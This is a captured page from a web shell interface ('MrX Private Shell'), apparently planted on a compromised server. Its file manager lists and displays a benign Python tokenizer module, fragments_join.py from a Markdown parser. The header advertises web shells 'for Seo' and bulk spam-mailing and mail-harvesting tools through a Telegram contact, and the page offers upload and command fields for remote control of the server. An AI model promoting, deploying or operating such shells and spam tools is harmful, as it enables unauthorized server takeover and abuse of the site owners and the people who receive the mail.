__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
from .state_inline import StateInline


def fragments_join(state: StateInline) -> None:
    """Merge adjacent text tokens and recompute all token nesting levels.

    After the emphasis/strikethrough postprocessing rules run, each
    delimiter marker (``*``, ``_``, ``~``) that started out as its own
    text token has either stayed text (and must be folded into the
    neighbouring text token) or become an opening/closing tag (which
    invalidates the ``level`` of every token between the pair).  This
    pass repairs both in one in-place sweep over ``state.tokens``.
    """
    tokens = state.tokens
    total = len(tokens)
    depth = 0

    # Compaction pointer: index where the next surviving token lands.
    write = 0
    for read in range(total):
        token = tokens[read]

        # A closing tag lowers the level before it is assigned; an
        # opening tag raises it for everything that follows.
        if token.nesting < 0:
            depth -= 1
        token.level = depth
        if token.nesting > 0:
            depth += 1

        merges_forward = (
            token.type == "text"
            and read + 1 < total
            and tokens[read + 1].type == "text"
        )
        if merges_forward:
            # Fold this text token's content into its neighbour; the
            # current slot is dropped during compaction below.
            tokens[read + 1].content = token.content + tokens[read + 1].content
        else:
            if read != write:
                tokens[write] = token
            write += 1

    # Trim the tail left over after compacting merged-away slots.
    if write != total:
        del tokens[write:]

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 696 B 0644
autolink.py File 2.03 KB 0644
backticks.py File 1.99 KB 0644
balance_pairs.py File 4.74 KB 0644
emphasis.py File 3.05 KB 0644
entity.py File 1.61 KB 0644
escape.py File 1.62 KB 0644
fragments_join.py File 1.46 KB 0644
html_inline.py File 1.1 KB 0644
image.py File 4.04 KB 0644
link.py File 4.22 KB 0644
linkify.py File 1.66 KB 0644
newline.py File 1.27 KB 0644
state_inline.py File 4.98 KB 0644
strikethrough.py File 3.14 KB 0644
text.py File 901 B 0644
Filemanager